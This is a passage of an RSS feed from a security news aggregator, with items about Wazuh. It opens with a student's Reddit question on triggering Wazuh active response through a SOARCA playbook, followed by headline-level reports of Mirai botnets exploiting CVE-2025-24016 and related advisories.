<description><![CDATA[Hello, apologies in advance if this isn't in the correct subreddit/flair aince i can't find a specific one. So currently, I have a SORCA + wazuh setup for a school project and i want to create a playbook to trigger wazuh's active response module. Currently, i'm triggering the playbook through Swa...]]></description>
<link>https://tsecurity.de/de/2900721/it-security-nachrichten/triggering-cacaov2-playbooks-via-swagger-ui-in-a-soarca-environment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2900721/it-security-nachrichten/triggering-cacaov2-playbooks-via-swagger-ui-in-a-soarca-environment/</guid>
<pubDate>Tue, 22 Jul 2025 19:49:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hello, apologies in advance if this isn't in the correct subreddit/flair aince i can't find a specific one. So currently, I have a SORCA + wazuh setup for a school project and i want to create a playbook to trigger wazuh's active response module. Currently, i'm triggering the playbook through Swagger UI through the "http://localhost:8080/swagger/index.html" but it just isn't working and its all the same issue. I've even tried with a playbook example from SOARCA github (http-playbook.json) and i keep getting this error 404 response:</p> <pre><code>{ "downstream-call": "{\"some\" : \"json\"}", "message": "missing argument in call", "original-call": "/example/route", "status": 400 } </code></pre> <p>i'm just so lost cause it seems every playbook i've tried just keeps giving me this error. What i want to acheive is a playbook version of this curl command: </p> <pre><code>curl -k -X PUT "https://&lt;wazuh-manager-ip&gt;:55000/active-response?agents_list=001" \ -H "Authorization: Bearer &lt;token&gt;" \ -H "Content-Type: application/json" \ -d '{ "command": "!ssh-terminate", "arguments": ["&lt;ip-address&gt;"] }' </code></pre> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Sea_Highway6808"> /u/Sea_Highway6808 </a> <br> <span><a href="https://www.reddit.com/r/ComputerSecurity/comments/1m6kk8j/triggering_cacaov2_playbooks_via_swagger_ui_in_a/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ComputerSecurity/comments/1m6kk8j/triggering_cacaov2_playbooks_via_swagger_ui_in_a/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Data Loss Prevention mit Wazuh strategisch umsetzen]]></title>
<description><![CDATA[Data Loss Prevention (DLP) stellt Unternehmen angesichts von Compliance-Vorgaben wie NIS-2 und ISO 27001:2022 vor große Herausforderungen. Kommerzielle DLP-Lösungen sind oft teuer und komplex und ersetzen nicht den strategischen Prozess für effektiven Datenschutz. Die Open-Source SIEM-Plattform W...]]></description>
<link>https://tsecurity.de/de/2899654/it-security-nachrichten/data-loss-prevention-mit-wazuh-strategisch-umsetzen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2899654/it-security-nachrichten/data-loss-prevention-mit-wazuh-strategisch-umsetzen/</guid>
<pubDate>Tue, 22 Jul 2025 11:19:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Data Loss Prevention (DLP) stellt Unternehmen angesichts von Compliance-Vorgaben wie NIS-2 und ISO 27001:2022 vor große Herausforderungen. Kommerzielle DLP-Lösungen sind oft teuer und komplex und ersetzen nicht den strategischen Prozess für effektiven Datenschutz. Die Open-Source SIEM-Plattform Wazuh bietet hier eine flexible, kostengünstige Alternative.]]></content:encoded>
</item>
<item>
<title><![CDATA[Zwei Botnets, eine Schwachstelle: Mirai-Verbreitung über Wazuh-Schwachstelle]]></title>
<description><![CDATA[Cybersecurity-Forscher warnen vor gezielten Angriffen auf eine kürzlich bekannt gewordene Schwachstelle in der Open-Source-Sicherheitsplattform ...]]></description>
<link>https://tsecurity.de/de/2840454/it-security-nachrichten/zwei-botnets-eine-schwachstelle-mirai-verbreitung-ueber-wazuh-schwachstelle/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2840454/it-security-nachrichten/zwei-botnets-eine-schwachstelle-mirai-verbreitung-ueber-wazuh-schwachstelle/</guid>
<pubDate>Thu, 19 Jun 2025 14:48:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersecurity-Forscher warnen vor gezielten Angriffen auf eine kürzlich bekannt gewordene Schwachstelle in der Open-Source-Sicherheitsplattform ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Zwei Botnets, eine Schwachstelle: Mirai-Verbreitung über Wazuh-Schwachstelle]]></title>
<description><![CDATA[Cybersecurity-Forscher warnen vor gezielten Angriffen auf eine kürzlich bekannt gewordene Schwachstelle in der Open-Source-Sicherheitsplattform Wazuh. 

Tags: #Botnet | #Schwachstelle]]></description>
<link>https://tsecurity.de/de/2839544/it-security-nachrichten/zwei-botnets-eine-schwachstelle-mirai-verbreitung-ueber-wazuh-schwachstelle/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2839544/it-security-nachrichten/zwei-botnets-eine-schwachstelle-mirai-verbreitung-ueber-wazuh-schwachstelle/</guid>
<pubDate>Thu, 19 Jun 2025 05:48:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2024/08/Botnet_Shutterstock_1814216762.jpg" class="attachment-full size-full wp-post-image" alt="Botnet, Botnetz, Zyxel" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2024/08/Botnet_Shutterstock_1814216762.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2024/08/Botnet_Shutterstock_1814216762-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2024/08/Botnet_Shutterstock_1814216762-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2024/08/Botnet_Shutterstock_1814216762-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2024/08/Botnet_Shutterstock_1814216762-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Zwei Botnets, eine Schwachstelle: Mirai-Verbreitung über Wazuh-Schwachstelle 1"></p>
    Cybersecurity-Forscher warnen vor gezielten Angriffen auf eine kürzlich bekannt gewordene Schwachstelle in der Open-Source-Sicherheitsplattform Wazuh. 

<p>Tags: <a href="https://www.it-daily.net/thema/botnet">#Botnet</a> | <a href="https://www.it-daily.net/thema/schwachstelle">#Schwachstelle</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Week in review: Microsoft fixes exploited zero-day, Mirai botnets target unpatched Wazuh servers]]></title>
<description><![CDATA[Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft fixes zero-day exploited for cyber espionage (CVE-2025-33053) For June 2025 Patch Tuesday, Microsoft has fixed 66 new CVEs, including a zero-day exploited in the wild (CVE-2025-33053). Unpa...]]></description>
<link>https://tsecurity.de/de/2832360/it-security-nachrichten/week-in-review-microsoft-fixes-exploited-zero-day-mirai-botnets-target-unpatched-wazuh-servers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2832360/it-security-nachrichten/week-in-review-microsoft-fixes-exploited-zero-day-mirai-botnets-target-unpatched-wazuh-servers/</guid>
<pubDate>Sun, 15 Jun 2025 10:03:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft fixes zero-day exploited for cyber espionage (CVE-2025-33053) For June 2025 Patch Tuesday, Microsoft has fixed 66 new CVEs, including a zero-day exploited in the wild (CVE-2025-33053). Unpatched Wazuh servers targeted by Mirai botnets (CVE-2025-24016) Two Mirai botnets are exploiting a critical remote code execution vulnerability (CVE-2025-24016) in the open-source Wazuh XDR/SIEM platform, Akamai researchers have warned. Want fewer security … <a href="https://www.helpnetsecurity.com/2025/06/15/week-in-review-microsoft-fixes-exploited-zero-day-mirai-botnets-target-unpatched-wazuh-servers/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2025/06/15/week-in-review-microsoft-fixes-exploited-zero-day-mirai-botnets-target-unpatched-wazuh-servers/">Week in review: Microsoft fixes exploited zero-day, Mirai botnets target unpatched Wazuh servers</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[U.S. CISA adds Wazuh, and WebDAV flaws to its Known Exploited Vulnerabilities catalog]]></title>
<description><![CDATA[U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Wazuh, and WebDAV flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added ASUS RT-AX55 devices, Craft CMS, and ConnectWise ScreenConnect flaws to its Known Exploi...]]></description>
<link>https://tsecurity.de/de/2827399/hacking/us-cisa-adds-wazuh-and-webdav-flaws-to-its-known-exploited-vulnerabilities-catalog/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2827399/hacking/us-cisa-adds-wazuh-and-webdav-flaws-to-its-known-exploited-vulnerabilities-catalog/</guid>
<pubDate>Thu, 12 Jun 2025 12:04:14 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Wazuh, and WebDAV flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added ASUS RT-AX55 devices, Craft CMS, and ConnectWise ScreenConnect flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these flaws: This week, Akamai researchers warned that […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacker missbrauchen Wazuh-Sicherheitslücke für Botnet-Angriffe]]></title>
<description><![CDATA[Cyberkriminelle nutzen eine gravierende Schwachstelle in der Open-Source-Sicherheitsplattform Wazuh aus, um Schadsoftware zu verbreiten. Die Angriffe setzen auf Varianten des berüchtigten Mirai-Botnets und starten massive DDoS-Attacken.

Tags: #Botnet | #Mirai | #Schwachstelle | #Sicherheitslücke]]></description>
<link>https://tsecurity.de/de/2827216/it-security-nachrichten/hacker-missbrauchen-wazuh-sicherheitsluecke-fuer-botnet-angriffe/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2827216/it-security-nachrichten/hacker-missbrauchen-wazuh-sicherheitsluecke-fuer-botnet-angriffe/</guid>
<pubDate>Thu, 12 Jun 2025 10:33:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2025/07/Botnet_Shutterstock_2506510877_neu_1920.jpg" class="attachment-full size-full wp-post-image" alt="Botnet, mirai botnet, wazuh sicherheitslücke, wazuh schwachstelle, cve-2025-24016, Wazuh, Mirai" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2025/07/Botnet_Shutterstock_2506510877_neu_1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2025/07/Botnet_Shutterstock_2506510877_neu_1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2025/07/Botnet_Shutterstock_2506510877_neu_1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2025/07/Botnet_Shutterstock_2506510877_neu_1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2025/07/Botnet_Shutterstock_2506510877_neu_1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Hacker missbrauchen Wazuh-Sicherheitslücke für Botnet-Angriffe 1"></p>
    Cyberkriminelle nutzen eine gravierende Schwachstelle in der Open-Source-Sicherheitsplattform Wazuh aus, um Schadsoftware zu verbreiten. Die Angriffe setzen auf Varianten des berüchtigten Mirai-Botnets und starten massive DDoS-Attacken.

<p>Tags: <a href="https://www.it-daily.net/thema/botnet">#Botnet</a> | <a href="https://www.it-daily.net/thema/mirai">#Mirai</a> | <a href="https://www.it-daily.net/thema/schwachstelle">#Schwachstelle</a> | <a href="https://www.it-daily.net/thema/sicherheitsluecke">#Sicherheitslücke</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-1243 | Wazuh Agent up to 4.7.x on Windows UNC Path certificate validation (GHSA-3crh-39qv-fxj7 / EUVD-2024-17008)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in Wazuh Agent up to 4.7.x on Windows. Affected by this vulnerability is an unknown functionality of the component UNC Path Handler. The manipulation leads to improper certificate validation.

This vulnerability is known as CVE-2024-1243. The attac...]]></description>
<link>https://tsecurity.de/de/2825789/sicherheitsluecken/cve-2024-1243-wazuh-agent-up-to-47x-on-windows-unc-path-certificate-validation-ghsa-3crh-39qv-fxj7-euvd-2024-17008/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2825789/sicherheitsluecken/cve-2024-1243-wazuh-agent-up-to-47x-on-windows-unc-path-certificate-validation-ghsa-3crh-39qv-fxj7-euvd-2024-17008/</guid>
<pubDate>Wed, 11 Jun 2025 18:06:22 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/?kb.risk">critical</a> was found in <a href="https://vuldb.com/?product.wazuh:agent">Wazuh Agent up to 4.7.x</a> on Windows. Affected by this vulnerability is an unknown functionality of the component <em>UNC Path Handler</em>. The manipulation leads to improper certificate validation.

This vulnerability is known as <a href="https://vuldb.com/?source_cve.312049">CVE-2024-1243</a>. The attack can be launched remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Mirai Botnets Exploit Flaw in Wazuh Security Platform]]></title>
<description><![CDATA[The two campaigns are good examples of the ever-shrinking time-to-exploit timelines that botnet operators have adopted for newly published CVEs.]]></description>
<link>https://tsecurity.de/de/2825316/it-security-nachrichten/mirai-botnets-exploit-flaw-in-wazuh-security-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2825316/it-security-nachrichten/mirai-botnets-exploit-flaw-in-wazuh-security-platform/</guid>
<pubDate>Wed, 11 Jun 2025 15:04:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The two campaigns are good examples of the ever-shrinking time-to-exploit timelines that botnet operators have adopted for newly published CVEs.]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA Adds Two Known Exploited Vulnerabilities to Catalog]]></title>
<description><![CDATA[CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. 



CVE-2025-24016 Wazuh Server Deserialization of Untrusted Data Vulnerability





CVE-2025-33053 Web Distributed Authoring and Versioning (WebDAV) External Con...]]></description>
<link>https://tsecurity.de/de/2823918/it-security-nachrichten/cisa-adds-two-known-exploited-vulnerabilities-to-catalog/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2823918/it-security-nachrichten/cisa-adds-two-known-exploited-vulnerabilities-to-catalog/</guid>
<pubDate>Tue, 10 Jun 2025 20:48:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="OutlineElement Ltr SCXW215314346 BCX8">
<p>CISA has added two new vulnerabilities to its <a class="Hyperlink SCXW215314346 BCX8" href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities (KEV) Catalog" rel="noreferrer noopener"><u>Known Exploited Vulnerabilities (KEV) Catalog</u></a>, based on evidence of active exploitation. </p>
</div>
<div class="ListContainerWrapper SCXW215314346 BCX8">
<ul>
<li><a class="fui-Link ___1q1shib f2hkw1w f3rmtva f1ewtqcl fyind8e f1k6fduh f1w7gpdv fk6fouc fjoy568 figsok6 f1s184ao f1mk8lai fnbmjn9 f1o700av f13mvf36 f1cmlufx f9n3di6 f1ids18y f1tx3yz7 f1deo86v f1eh06m1 f1iescvh fhgqx19 f1olyrje f1p93eir f1nev41a f1h8hb77 f1lqvz6u f10aw75t fsle3fq f17ae5zn" href="https://www.cve.org/CVERecord?id=CVE-2025-24016" target="_blank" title="CVE-2025-24016" rel="noreferrer noopener"><u>CVE-2025-24016</u></a> Wazuh Server Deserialization of Untrusted Data Vulnerability</li>
</ul>
</div>
<div class="ListContainerWrapper SCXW215314346 BCX8">
<ul>
<li>
<p lang="EN-US"><a class="fui-Link ___1q1shib f2hkw1w f3rmtva f1ewtqcl fyind8e f1k6fduh f1w7gpdv fk6fouc fjoy568 figsok6 f1s184ao f1mk8lai fnbmjn9 f1o700av f13mvf36 f1cmlufx f9n3di6 f1ids18y f1tx3yz7 f1deo86v f1eh06m1 f1iescvh fhgqx19 f1olyrje f1p93eir f1nev41a f1h8hb77 f1lqvz6u f10aw75t fsle3fq f17ae5zn" href="https://www.cve.org/CVERecord?id=CVE-2025-33053" target="_blank" title="CVE-2025-33053" rel="noreferrer noopener"><u>CVE-2025-33053</u></a> Web Distributed Authoring and Versioning (WebDAV) External Control of File Name or Path Vulnerability</p>
</li>
</ul>
</div>
<div class="OutlineElement Ltr SCXW215314346 BCX8">
<p>These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. </p>
</div>
<div class="OutlineElement Ltr SCXW215314346 BCX8">
<p><a class="Hyperlink SCXW215314346 BCX8" href="https://www.cisa.gov/binding-operational-directive-22-01" title="Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities" rel="noreferrer noopener"><u>Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities</u></a> established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the <a class="Hyperlink SCXW215314346 BCX8" href="https://www.cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf" title="BOD 22-01 Fact Sheet" rel="noreferrer noopener"><u>BOD 22-01 Fact Sheet</u></a> for more information. </p>
</div>
<div class="OutlineElement Ltr SCXW215314346 BCX8">
<p>Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of <a class="Hyperlink SCXW215314346 BCX8" href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="KEV Catalog vulnerabilities" rel="noreferrer noopener"><u>KEV Catalog vulnerabilities</u></a> as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the <a class="Hyperlink SCXW215314346 BCX8" href="https://www.cisa.gov/known-exploited-vulnerabilities" title="Reducing the Significant Risk of Known Exploited Vulnerabilities" rel="noreferrer noopener"><u>specified criteria</u></a>. </p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Wazuh bug exploited in growing Mirai botnet infection]]></title>
<description><![CDATA[The open-source XDR/SIEM provider’s servers are in other botnets’ crosshairs too Cybercriminals are trying to spread multiple Mirai variants by exploiting a critical Wazuh vulnerability, researchers say – the first reported active attacks since the code execution bug was disclosed.…]]></description>
<link>https://tsecurity.de/de/2823604/it-security-nachrichten/critical-wazuh-bug-exploited-in-growing-mirai-botnet-infection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2823604/it-security-nachrichten/critical-wazuh-bug-exploited-in-growing-mirai-botnet-infection/</guid>
<pubDate>Tue, 10 Jun 2025 18:18:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>The open-source XDR/SIEM provider’s servers are in other botnets’ crosshairs too</h4> <p>Cybercriminals are trying to spread multiple Mirai variants by exploiting a critical Wazuh vulnerability, researchers say – the first reported active attacks since the code execution bug was disclosed.…</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mirai botnets exploit Wazuh RCE, Akamai warned]]></title>
<description><![CDATA[Mirai botnets are exploiting CVE-2025-24016, a critical remote code execution flaw in Wazuh servers, Akamai warned. Akamai researchers warn that multiple Mirai botnets exploit the critical remote code execution vulnerability CVE-2025-24016 (CVSS score of 9.9) affecting Wazuh servers. Wazuh is an ...]]></description>
<link>https://tsecurity.de/de/2822896/hacking/mirai-botnets-exploit-wazuh-rce-akamai-warned/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2822896/hacking/mirai-botnets-exploit-wazuh-rce-akamai-warned/</guid>
<pubDate>Tue, 10 Jun 2025 13:04:37 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mirai botnets are exploiting CVE-2025-24016, a critical remote code execution flaw in Wazuh servers, Akamai warned. Akamai researchers warn that multiple Mirai botnets exploit the critical remote code execution vulnerability CVE-2025-24016 (CVSS score of 9.9) affecting Wazuh servers. Wazuh is an open-source security platform used for threat detection, intrusion detection, log data analysis, and compliance […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Unpatched Wazuh servers targeted by Mirai botnets (CVE-2025-24016)]]></title>
<description><![CDATA[Two Mirai botnets are exploiting a critical remote code execution vulnerability (CVE-2025-24016) in the open-source Wazuh XDR/SIEM platform, Akamai researchers have warned. What is Wazuh? Wazuh is a popular open-source security information and event management (SIEM) and extended detection and re...]]></description>
<link>https://tsecurity.de/de/2822847/it-security-nachrichten/unpatched-wazuh-servers-targeted-by-mirai-botnets-cve-2025-24016/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2822847/it-security-nachrichten/unpatched-wazuh-servers-targeted-by-mirai-botnets-cve-2025-24016/</guid>
<pubDate>Tue, 10 Jun 2025 12:33:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Two Mirai botnets are exploiting a critical remote code execution vulnerability (CVE-2025-24016) in the open-source Wazuh XDR/SIEM platform, Akamai researchers have warned. What is Wazuh? Wazuh is a popular open-source security information and event management (SIEM) and extended detection and response (XDR) solution that’s widely used for host-based intrusion detection, log analysis, file integrity monitoring, and more. It’s core components are: Wazuh Manager (server component), which analyzes data and triggers alerts. Made to be installed … <a href="https://www.helpnetsecurity.com/2025/06/10/unpatched-wazuh-servers-targeted-by-mirai-botnets-cve-2025-24016/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2025/06/10/unpatched-wazuh-servers-targeted-by-mirai-botnets-cve-2025-24016/">Unpatched Wazuh servers targeted by Mirai botnets (CVE-2025-24016)</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Exploitation of Critical Wazuh Server RCE Vulnerability Leads to Mirai Variant Deployment]]></title>
<description><![CDATA[The Akamai Security Intelligence and Response Team (SIRT) has uncovered active exploitation of a critical remote code execution (RCE) vulnerability in Wazuh servers, identified as CVE-2025-24016 with a CVSS score of 9.9. Disclosed in February 2025, this vulnerability affects Wazuh versions 4.4.0 ...]]></description>
<link>https://tsecurity.de/de/2822792/hacking/exploitation-of-critical-wazuh-server-rce-vulnerability-leads-to-mirai-variant-deployment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2822792/hacking/exploitation-of-critical-wazuh-server-rce-vulnerability-leads-to-mirai-variant-deployment/</guid>
<pubDate>Tue, 10 Jun 2025 12:03:26 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Akamai Security Intelligence and Response Team (SIRT) has uncovered active exploitation of a critical remote code execution (RCE) vulnerability in Wazuh servers, identified as CVE-2025-24016 with a CVSS score of 9.9. Disclosed in February 2025, this vulnerability affects Wazuh versions 4.4.0 through 4.9.0 and stems from unsafe deserialization in the Distributed API (DAPI) requests, […]</p>
<p>The post <a href="https://gbhackers.com/exploitation-of-critical-wazuh-server-rce-vulnerability/">Exploitation of Critical Wazuh Server RCE Vulnerability Leads to Mirai Variant Deployment</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Designing Blue Team playbooks with Wazuh for proactive incident response]]></title>
<description><![CDATA[Blue Team playbooks are essential—but tools like Wazuh take them to the next level. From credential dumping to web shells and brute-force attacks, see how Wazuh strengthens real-time detection and automated response. [...]]]></description>
<link>https://tsecurity.de/de/2821426/it-security-nachrichten/designing-blue-team-playbooks-with-wazuh-for-proactive-incident-response/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2821426/it-security-nachrichten/designing-blue-team-playbooks-with-wazuh-for-proactive-incident-response/</guid>
<pubDate>Mon, 09 Jun 2025 18:03:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Blue Team playbooks are essential—but tools like Wazuh take them to the next level. From credential dumping to web shells and brute-force attacks, see how Wazuh strengthens real-time detection and automated response. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Two Distinct Botnets Exploit Wazuh Server Vulnerability to Launch Mirai-Based Attacks]]></title>
<description><![CDATA[A now-patched critical security flaw in the Wazur Server is being exploited by threat actors to drop two different Mirai botnet variants and use them to conduct distributed denial-of-service (DDoS) attacks.
Akamai, which first discovered the exploitation efforts in late March 2025, said the malic...]]></description>
<link>https://tsecurity.de/de/2821383/it-security-nachrichten/two-distinct-botnets-exploit-wazuh-server-vulnerability-to-launch-mirai-based-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2821383/it-security-nachrichten/two-distinct-botnets-exploit-wazuh-server-vulnerability-to-launch-mirai-based-attacks/</guid>
<pubDate>Mon, 09 Jun 2025 17:32:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A now-patched critical security flaw in the Wazur Server is being exploited by threat actors to drop two different Mirai botnet variants and use them to conduct distributed denial-of-service (DDoS) attacks.
Akamai, which first discovered the exploitation efforts in late March 2025, said the malicious campaign targets CVE-2025-24016 (CVSS score: 9.9), an unsafe deserialization vulnerability that]]></content:encoded>
</item>
<item>
<title><![CDATA[Designing Blue Team playbooks with Wazuh for proactive cyber defense]]></title>
<description><![CDATA[Blue Team playbooks are essential—but tools like Wazuh take them to the next level. From credential dumping to web shells and brute-force attacks, see how Wazuh strengthens real-time detection and automated response. [...]]]></description>
<link>https://tsecurity.de/de/2821311/it-security-nachrichten/designing-blue-team-playbooks-with-wazuh-for-proactive-cyber-defense/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2821311/it-security-nachrichten/designing-blue-team-playbooks-with-wazuh-for-proactive-cyber-defense/</guid>
<pubDate>Mon, 09 Jun 2025 16:48:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Blue Team playbooks are essential—but tools like Wazuh take them to the next level. From credential dumping to web shells and brute-force attacks, see how Wazuh strengthens real-time detection and automated response. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Mirai Botnets Exploiting Wazuh Security Platform Vulnerability ]]></title>
<description><![CDATA[CVE-2025-24016, a critical remote code execution vulnerability affecting Wazuh servers, has been exploited by Mirai botnets.
The post Mirai Botnets Exploiting Wazuh Security Platform Vulnerability  appeared first on SecurityWeek.]]></description>
<link>https://tsecurity.de/de/2821290/it-security-nachrichten/mirai-botnets-exploiting-wazuh-security-platform-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2821290/it-security-nachrichten/mirai-botnets-exploiting-wazuh-security-platform-vulnerability/</guid>
<pubDate>Mon, 09 Jun 2025 16:32:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>CVE-2025-24016, a critical remote code execution vulnerability affecting Wazuh servers, has been exploited by Mirai botnets.</p>
<p>The post <a href="https://www.securityweek.com/mirai-botnets-exploiting-wazuh-security-platform-vulnerability/">Mirai Botnets Exploiting Wazuh Security Platform Vulnerability </a> appeared first on <a href="https://www.securityweek.com/">SecurityWeek</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Securing CI/CD workflows with Wazuh]]></title>
<description><![CDATA[Continuous Integration and Continuous Delivery/Deployment (CI/CD) refers to practices that automate how code is developed and released to different environments. CI/CD pipelines are fundamental in modern software development, ensuring code is consistently tested, built, and deployed quickly and e...]]></description>
<link>https://tsecurity.de/de/2789381/it-security-nachrichten/securing-cicd-workflows-with-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2789381/it-security-nachrichten/securing-cicd-workflows-with-wazuh/</guid>
<pubDate>Wed, 21 May 2025 14:48:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Continuous Integration and Continuous Delivery/Deployment (CI/CD) refers to practices that automate how code is developed and released to different environments. CI/CD pipelines are fundamental in modern software development, ensuring code is consistently tested, built, and deployed quickly and efficiently.
While CI/CD automation accelerates software delivery, it can also introduce security]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-24016 | Wazuh up to 4.9.0 common.py as_wazuh_object deserialization (Nessus ID 235712)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Wazuh up to 4.9.0. This issue affects the function as_wazuh_object of the file framework/wazuh/core/cluster/common.py. The manipulation leads to deserialization.

The identification of this vulnerability is CVE-2025-24016. The a...]]></description>
